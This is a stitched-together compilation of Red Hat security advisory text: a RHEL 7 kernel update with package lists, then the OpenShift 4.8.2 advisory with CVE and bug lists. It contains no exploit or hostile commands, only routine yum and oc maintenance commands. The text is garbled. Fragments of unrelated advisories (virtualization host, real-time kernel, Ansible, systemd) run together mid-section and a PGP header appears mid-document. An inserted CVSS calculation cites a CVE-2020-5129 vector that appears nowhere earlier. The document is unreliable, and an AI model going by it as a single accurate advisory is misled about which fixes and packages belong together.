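A typical sequence on an affected host (a sketch of the standard yum workflow described at that link, using the package names from the Package List section below):

    $ sudo yum update kernel
    $ sudo reboot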

The system must be rebooted for this update to take effect. Bugs fixed (https://bugzilla.redhat.com/):

1824792 - CVE-2020-11668 kernel: mishandles invalid descriptors in drivers/media/usb/gspca/xirlink_cit.c 1902788 - CVE-2019-20934 kernel: use-after-free in show_numa_stats function 1961300 - CVE-2021-33033 kernel: use-after-free in cipso_v4_genopt in net/ipv4/cipso_ipv4.c 1961305 - CVE-2021-33034 kernel: use-after-free in net/bluetooth/hci_event.c when destroying an hci_chan 1970273 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer

  1. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: kernel-3.10.0-1160.36.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm kernel-doc-3.10.0-1160.36.2.el7.noarch.rpm

x86_64: bpftool-3.10.0-1160.36.2.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm kernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm perf-3.10.0-1160.36.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

Source: kernel-3.10.0-1160.36.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm kernel-doc-3.10.0-1160.36.2.el7.noarch.rpm

x86_64: bpftool-3.10.0-1160.36.2.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm kernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm perf-3.10.0-1160.36.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64: bpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1160.36.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: kernel-3.10.0-1160.36.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm kernel-doc-3.10.0-1160.36.2.el7.noarch.rpm

ppc64: bpftool-3.10.0-1160.36.2.el7.ppc64.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-3.10.0-1160.36.2.el7.ppc64.rpm kernel-bootwrapper-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debug-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1160.36.2.el7.ppc64.rpm kernel-devel-3.10.0-1160.36.2.el7.ppc64.rpm kernel-headers-3.10.0-1160.36.2.el7.ppc64.rpm kernel-tools-3.10.0-1160.36.2.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-tools-libs-3.10.0-1160.36.2.el7.ppc64.rpm perf-3.10.0-1160.36.2.el7.ppc64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm python-perf-3.10.0-1160.36.2.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm

ppc64le: bpftool-3.10.0-1160.36.2.el7.ppc64le.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debug-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-devel-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-headers-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-tools-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-tools-libs-3.10.0-1160.36.2.el7.ppc64le.rpm perf-3.10.0-1160.36.2.el7.ppc64le.rpm perf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm python-perf-3.10.0-1160.36.2.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm

s390x: bpftool-3.10.0-1160.36.2.el7.s390x.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm kernel-3.10.0-1160.36.2.el7.s390x.rpm kernel-debug-3.10.0-1160.36.2.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.s390x.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-1160.36.2.el7.s390x.rpm kernel-devel-3.10.0-1160.36.2.el7.s390x.rpm kernel-headers-3.10.0-1160.36.2.el7.s390x.rpm kernel-kdump-3.10.0-1160.36.2.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm kernel-kdump-devel-3.10.0-1160.36.2.el7.s390x.rpm perf-3.10.0-1160.36.2.el7.s390x.rpm perf-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm python-perf-3.10.0-1160.36.2.el7.s390x.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm

x86_64: bpftool-3.10.0-1160.36.2.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm kernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm perf-3.10.0-1160.36.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64: bpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1160.36.2.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-1160.36.2.el7.ppc64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm

ppc64le: bpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-1160.36.2.el7.ppc64le.rpm perf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm

x86_64: bpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1160.36.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: kernel-3.10.0-1160.36.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm kernel-doc-3.10.0-1160.36.2.el7.noarch.rpm

x86_64: bpftool-3.10.0-1160.36.2.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm kernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm perf-3.10.0-1160.36.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7). Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. These packages include redhat-release-virtualization-host. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.

Bug Fix(es):

  • xfs umount hangs in xfs_wait_buftarg() due to negative bt_io_count (BZ#1949916)

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Ansible is an SSH-based configuration management, deployment, and task execution system. The openshift-ansible packages contain Ansible code and playbooks for installing and upgrading OpenShift Container Platform 3. systemd provides aggressive parallelism capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, and keeps track of processes using Linux cgroups. In addition, it supports snapshotting and restoring of the system state, maintains mount and automount points, and implements an elaborate transactional dependency-based service control logic. It can also work as a drop-in replacement for sysvinit.

Bug Fix(es):

  • kernel-rt: update RT source tree to the RHEL-8.3.z source tree (BZ#1957359)

  • Placeholder bug for OCP 4.7.0 rpm release (BZ#1983534)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Moderate: OpenShift Container Platform 4.8.2 bug fix and security update Advisory ID: RHSA-2021:2438-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2021:2438 Issue date: 2021-07-27 CVE Names: CVE-2016-2183 CVE-2020-7774 CVE-2020-15106 CVE-2020-15112 CVE-2020-15113 CVE-2020-15114 CVE-2020-15136 CVE-2020-26160 CVE-2020-26541 CVE-2020-28469 CVE-2020-28500 CVE-2020-28852 CVE-2021-3114 CVE-2021-3121 CVE-2021-3516 CVE-2021-3517 CVE-2021-3518 CVE-2021-3520 CVE-2021-3537 CVE-2021-3541 CVE-2021-3636 CVE-2021-20206 CVE-2021-20271 CVE-2021-20291 CVE-2021-21419 CVE-2021-21623 CVE-2021-21639 CVE-2021-21640 CVE-2021-21648 CVE-2021-22133 CVE-2021-23337 CVE-2021-23362 CVE-2021-23368 CVE-2021-23382 CVE-2021-25735 CVE-2021-25737 CVE-2021-26539 CVE-2021-26540 CVE-2021-27292 CVE-2021-28092 CVE-2021-29059 CVE-2021-29622 CVE-2021-32399 CVE-2021-33034 CVE-2021-33194 CVE-2021-33909 =====================================================================

  1. Summary:

Red Hat OpenShift Container Platform release 4.8.2 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.8.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
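For reference, a published CVSS v3.1 base score can be reproduced from its vector using the formulas in the CVSS v3.1 specification. A minimal Python sketch, using the vector recorded earlier in this section for CVE-2020-5129 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H):

    import math

    # CVSS v3.1 weights for AV:N / AC:L / PR:N / UI:N with scope Unchanged.
    av, ac, pr, ui = 0.85, 0.77, 0.85, 0.85
    c, i, a = 0.0, 0.0, 0.56                   # C:None, I:None, A:High

    iss = 1 - (1 - c) * (1 - i) * (1 - a)      # impact sub-score = 0.56
    impact = 6.42 * iss                        # 3.5952, reported as 3.6
    exploitability = 8.22 * av * ac * pr * ui  # 3.8870, reported as 3.9

    # The spec's Roundup(): round up to one decimal place.
    base = 0.0 if impact <= 0 else math.ceil(min(impact + exploitability, 10) * 10) / 10
    print(base)                                # 7.5, matching the recorded baseScore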

  1. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.8.2. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2021:2437

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html

Security Fix(es):

  • SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) (CVE-2016-2183)

  • gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)

  • nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)

  • etcd: Large slice causes panic in decodeRecord method (CVE-2020-15106)

  • etcd: DoS in wal/wal.go (CVE-2020-15112)

  • etcd: directories created via os.MkdirAll are not checked for permissions (CVE-2020-15113)

  • etcd: gateway can include itself as an endpoint resulting in resource exhaustion and leads to DoS (CVE-2020-15114)

  • etcd: no authentication is performed against endpoints provided in the --endpoints flag (CVE-2020-15136)

  • jwt-go: access restriction bypass vulnerability (CVE-2020-26160)

  • nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)

  • nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions (CVE-2020-28500)

  • golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag (CVE-2020-28852)

  • golang: crypto/elliptic: incorrect operations on the P-224 curve (CVE-2021-3114)

  • containernetworking-cni: Arbitrary path injection via type field in CNI configuration (CVE-2021-20206)

  • containers/storage: DoS via malicious image (CVE-2021-20291)

  • prometheus: open redirect under the /new endpoint (CVE-2021-29622)

  • golang: x/net/html: infinite loop in ParseFragment (CVE-2021-33194)

  • go.elastic.co/apm: leaks sensitive HTTP headers during panic (CVE-2021-22133)

Space precludes listing in detail the following additional CVE fixes: (CVE-2021-27292), (CVE-2021-28092), (CVE-2021-29059), (CVE-2021-23382), (CVE-2021-26539), (CVE-2021-26540), (CVE-2021-23337), (CVE-2021-23362) and (CVE-2021-23368)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:

You may download the oc tool and use it to inspect release image metadata as follows:

(For x86_64 architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.8.2-x86_64

The image digest is sha256:0e82d17ababc79b10c10c5186920232810aeccbccf2a74c691487090a2c98ebc

(For s390x architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.8.2-s390x

The image digest is sha256:a284c5c3fa21b06a6a65d82be1dc7e58f378aa280acd38742fb167a26b91ecb5

(For ppc64le architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.8.2-ppc64le

The image digest is sha256:da989b8e28bccadbb535c2b9b7d3597146d14d254895cd35f544774f374cdd0f

All OpenShift Container Platform 4.8 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.8/updating/updating-cluster-between-minor.html#understanding-upgrade-channels_updating-cluster-between-minor
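The digests above can also be used to inspect or upgrade to an exact release image rather than a floating tag, for example (using the x86_64 digest from this advisory):

    $ oc adm release info quay.io/openshift-release-dev/ocp-release@sha256:0e82d17ababc79b10c10c5186920232810aeccbccf2a74c691487090a2c98ebc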

  1. Solution:

For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html

Details on how to access this content are available at https://docs.openshift.com/container-platform/4.8/updating/updating-cluster-cli.html

  1. Bugs fixed (https://bugzilla.redhat.com/):

1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) 1725981 - oc explain does not work well with full resource.group names 1747270 - [osp] Machine with name "-worker"couldn't join the cluster 1772993 - rbd block devices attached to a host are visible in unprivileged container pods 1786273 - [4.6] KAS pod logs show "error building openapi models ... has invalid property: anyOf" for CRDs 1786314 - [IPI][OSP] Install fails on OpenStack with self-signed certs unless the node running the installer has the CA cert in its system trusts 1801407 - Router in v4v6 mode puts brackets around IPv4 addresses in the Forwarded header 1812212 - ArgoCD example application cannot be downloaded from github 1817954 - [ovirt] Workers nodes are not numbered sequentially 1824911 - PersistentVolume yaml editor is read-only with system:persistent-volume-provisioner ClusterRole 1825219 - openshift-apiserver becomes False after env runs some time due to communication between one master to pods on another master fails with "Unable to connect to the server" 1825417 - The containerruntimecontroller doesn't roll back to CR-1 if we delete CR-2 1834551 - ClusterOperatorDown fires when operator is only degraded; states will block upgrades 1835264 - Intree provisioner doesn't respect PVC.spec.dataSource sometimes 1839101 - Some sidebar links in developer perspective don't follow same project 1840881 - The KubeletConfigController cannot process multiple confs for a pool/ pool changes 1846875 - Network setup test high failure rate 1848151 - Console continues to poll the ClusterVersion resource when the user doesn't have authority 1850060 - After upgrading to 3.11.219 timeouts are appearing. 1852637 - Kubelet sets incorrect image names in node status images section 1852743 - Node list CPU column only show usage 1853467 - container_fs_writes_total is inconsistent with CPU/memory in summarizing cgroup values 1857008 - [Edge] [BareMetal] Not provided STATE value for machines 1857477 - Bad helptext for storagecluster creation 1859382 - check-endpoints panics on graceful shutdown 1862084 - Inconsistency of time formats in the OpenShift web-console 1864116 - Cloud credential operator scrolls warnings about unsupported platform 1866222 - Should output all options when runing operator-sdk init --help 1866318 - [RHOCS Usability Study][Dashboard] Users found it difficult to navigate to the OCS dashboard 1866322 - [RHOCS Usability Study][Dashboard] Alert details page does not help to explain the Alert 1866331 - [RHOCS Usability Study][Dashboard] Users need additional tooltips or definitions 1868755 - [vsphere] terraform provider vsphereprivate crashes when network is unavailable on host 1868870 - CVE-2020-15113 etcd: directories created via os.MkdirAll are not checked for permissions 1868872 - CVE-2020-15112 etcd: DoS in wal/wal.go 1868874 - CVE-2020-15114 etcd: gateway can include itself as an endpoint resulting in resource exhaustion and leads to DoS 1868880 - CVE-2020-15136 etcd: no authentication is performed against endpoints provided in the --endpoints flag 1868883 - CVE-2020-15106 etcd: Large slice causes panic in decodeRecord method 1871303 - [sig-instrumentation] Prometheus when installed on the cluster should have important platform topology metrics 1871770 - [IPI baremetal] The Keepalived.conf file is not indented evenly 1872659 - ClusterAutoscaler doesn't scale down when a node is not needed anymore 1873079 - SSH to api and console route is possible when the clsuter is hosted on Openstack 
1873649 - proxy.config.openshift.io should validate user inputs 1874322 - openshift/oauth-proxy: htpasswd using SHA1 to store credentials 1874931 - Accessibility - Keyboard shortcut to exit YAML editor not easily discoverable 1876918 - scheduler test leaves taint behind 1878199 - Remove Log Level Normalization controller in cluster-config-operator release N+1 1878655 - [aws-custom-region] creating manifests take too much time when custom endpoint is unreachable 1878685 - Ingress resource with "Passthrough" annotation does not get applied when using the newer "networking.k8s.io/v1" API 1879077 - Nodes tainted after configuring additional host iface 1879140 - console auth errors not understandable by customers 1879182 - switch over to secure access-token logging by default and delete old non-sha256 tokens 1879184 - CVO must detect or log resource hotloops 1879495 - [4.6] namespace \“openshift-user-workload-monitoring\” does not exist” 1879638 - Binary file uploaded to a secret in OCP 4 GUI is not properly converted to Base64-encoded string 1879944 - [OCP 4.8] Slow PV creation with vsphere 1880757 - AWS: master not removed from LB/target group when machine deleted 1880758 - Component descriptions in cloud console have bad description (Managed by Terraform) 1881210 - nodePort for router-default metrics with NodePortService does not exist 1881481 - CVO hotloops on some service manifests 1881484 - CVO hotloops on deployment manifests 1881514 - CVO hotloops on imagestreams from cluster-samples-operator 1881520 - CVO hotloops on (some) clusterrolebindings 1881522 - CVO hotloops on clusterserviceversions packageserver 1881662 - Error getting volume limit for plugin kubernetes.io/ in kubelet logs 1881694 - Evidence of disconnected installs pulling images from the local registry instead of quay.io 1881938 - migrator deployment doesn't tolerate masters 1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability 1883587 - No option for user to select volumeMode 1883993 - Openshift 4.5.8 Deleting pv disk vmdk after delete machine 1884053 - cluster DNS experiencing disruptions during cluster upgrade in insights cluster 1884800 - Failed to set up mount unit: Invalid argument 1885186 - Removing ssh keys MC does not remove the key from authorized_keys 1885349 - [IPI Baremetal] Proxy Information Not passed to metal3 1885717 - activeDeadlineSeconds DeadlineExceeded does not show terminated container statuses 1886572 - auth: error contacting auth provider when extra ingress (not default) goes down 1887849 - When creating new storage class failure_domain is missing. 
1888712 - Worker nodes do not come up on a baremetal IPI deployment with control plane network configured on a vlan on top of bond interface due to Pending CSRs 1889689 - AggregatedAPIErrors alert may never fire 1890678 - Cypress: Fix 'structure' accesibility violations 1890828 - Intermittent prune job failures causing operator degradation 1891124 - CP Conformance: CRD spec and status failures 1891301 - Deleting bmh by "oc delete bmh' get stuck 1891696 - [LSO] Add capacity UI does not check for node present in selected storageclass 1891766 - [LSO] Min-Max filter's from OCS wizard accepts Negative values and that cause PV not getting created 1892642 - oauth-server password metrics do not appear in UI after initial OCP installation 1892718 - HostAlreadyClaimed: The new route cannot be loaded with a new api group version 1893850 - Add an alert for requests rejected by the apiserver 1893999 - can't login ocp cluster with oc 4.7 client without the username 1895028 - [gcp-pd-csi-driver-operator] Volumes created by CSI driver are not deleted on cluster deletion 1895053 - Allow builds to optionally mount in cluster trust stores 1896226 - recycler-pod template should not be in kubelet static manifests directory 1896321 - MachineSet scaling from 0 is not available or evaluated incorrectly for the new or changed instance types 1896751 - [RHV IPI] Worker nodes stuck in the Provisioning Stage if the machineset has a long name 1897415 - [Bare Metal - Ironic] provide the ability to set the cipher suite for ipmitool when doing a Bare Metal IPI install 1897621 - Auth test.Login test.logs in as kubeadmin user: Timeout 1897918 - [oVirt] e2e tests fail due to kube-apiserver not finishing 1898680 - CVE-2020-7774 nodejs-y18n: prototype pollution vulnerability 1899057 - fix spurious br-ex MAC address error log 1899187 - [Openstack] node-valid-hostname.service failes during the first boot leading to 5 minute provisioning delay 1899587 - [External] RGW usage metrics shown on Object Service Dashboard is incorrect 1900454 - Enable host-based disk encryption on Azure platform 1900819 - Scaled ingress replicas following sharded pattern don't balance evenly across multi-AZ 1901207 - Search Page - Pipeline resources table not immediately updated after Name filter applied or removed 1901535 - Remove the managingOAuthAPIServer field from the authentication.operator API 1901648 - "do you need to set up custom dns" tooltip inaccurate 1902003 - Jobs Completions column is not sorting when there are "0 of 1" and "1 of 1" in the list. 1902076 - image registry operator should monitor status of its routes 1902247 - openshift-oauth-apiserver apiserver pod crashloopbackoffs 1903055 - [OSP] Validation should fail when no any IaaS flavor or type related field are given 1903228 - Pod stuck in Terminating, runc init process frozen 1903383 - Latest RHCOS 47.83. 
builds failing to install: mount /root.squashfs failed 1903553 - systemd container renders node NotReady after deleting it 1903700 - metal3 Deployment doesn't have unique Pod selector 1904006 - The --dir option doest not work for command oc image extract 1904505 - Excessive Memory Use in Builds 1904507 - vsphere-problem-detector: implement missing metrics 1904558 - Random init-p error when trying to start pod 1905095 - Images built on OCP 4.6 clusters create manifests that result in quay.io (and other registries) rejecting those manifests 1905147 - ConsoleQuickStart Card's prerequisites is a combined text instead of a list 1905159 - Installation on previous unused dasd fails after formatting 1905331 - openshift-multus initContainer multus-binary-copy, etc. are not requesting required resources: cpu, memory 1905460 - Deploy using virtualmedia for disabled provisioning network on real BM(HPE) fails 1905577 - Control plane machines not adopted when provisioning network is disabled 1905627 - Warn users when using an unsupported browser such as IE 1905709 - Machine API deletion does not properly handle stopped instances on AWS or GCP 1905849 - Default volumesnapshotclass should be created when creating default storageclass 1906056 - Bundles skipped via the skips field cannot be pinned 1906102 - CBO produces standard metrics 1906147 - ironic-rhcos-downloader should not use --insecure 1906304 - Unexpected value NaN parsing x/y attribute when viewing pod Memory/CPU usage chart 1906740 - [aws]Machine should be "Failed" when creating a machine with invalid region 1907309 - Migrate controlflow v1alpha1 to v1beta1 in storage 1907315 - the internal load balancer annotation for AWS should use "true" instead of "0.0.0.0/0" as value 1907353 - [4.8] OVS daemonset is wasting resources even though it doesn't do anything 1907614 - Update kubernetes deps to 1.20 1908068 - Enable DownwardAPIHugePages feature gate 1908169 - The example of Import URL is "Fedora cloud image list" for all templates. 
1908170 - sriov network resource injector: Hugepage injection doesn't work with mult container 1908343 - Input labels in Manage columns modal should be clickable 1908378 - [sig-network] pods should successfully create sandboxes by getting pod - Static Pod Failures 1908655 - "Evaluating rule failed" for "record: node:node_num_cpu:sum" rule 1908762 - [Dualstack baremetal cluster] multicast traffic is not working on ovn-kubernetes 1908765 - [SCALE] enable OVN lflow data path groups 1908774 - [SCALE] enable OVN DB memory trimming on compaction 1908916 - CNO: turn on OVN DB RAFT diffs once all master DB pods are capable of it 1909091 - Pod/node/ip/template isn't showing when vm is running 1909600 - Static pod installer controller deadlocks with non-existing installer pod, WAS: kube-apisrever of clsuter operator always with incorrect status due to pleg error 1909849 - release-openshift-origin-installer-e2e-aws-upgrade-fips-4.4 is perm failing 1909875 - [sig-cluster-lifecycle] Cluster version operator acknowledges upgrade : timed out waiting for cluster to acknowledge upgrade 1910067 - UPI: openstacksdk fails on "server group list" 1910113 - periodic-ci-openshift-release-master-ocp-4.5-ci-e2e-44-stable-to-45-ci is never passing 1910318 - OC 4.6.9 Installer failed: Some pods are not scheduled: 3 node(s) didn't match node selector: AWS compute machines without status 1910378 - socket timeouts for webservice communication between pods 1910396 - 4.6.9 cred operator should back-off when provisioning fails on throttling 1910500 - Could not list CSI provisioner on web when create storage class on GCP platform 1911211 - Should show the cert-recovery-controller version correctly 1911470 - ServiceAccount Registry Authfiles Do Not Contain Entries for Public Hostnames 1912571 - libvirt: Support setting dnsmasq options through the install config 1912820 - openshift-apiserver Available is False with 3 pods not ready for a while during upgrade 1913112 - BMC details should be optional for unmanaged hosts 1913338 - CVE-2020-28852 golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag 1913341 - GCP: strange cluster behavior in CI run 1913399 - switch to v1beta1 for the priority and fairness APIs 1913525 - Panic in OLM packageserver when invoking webhook authorization 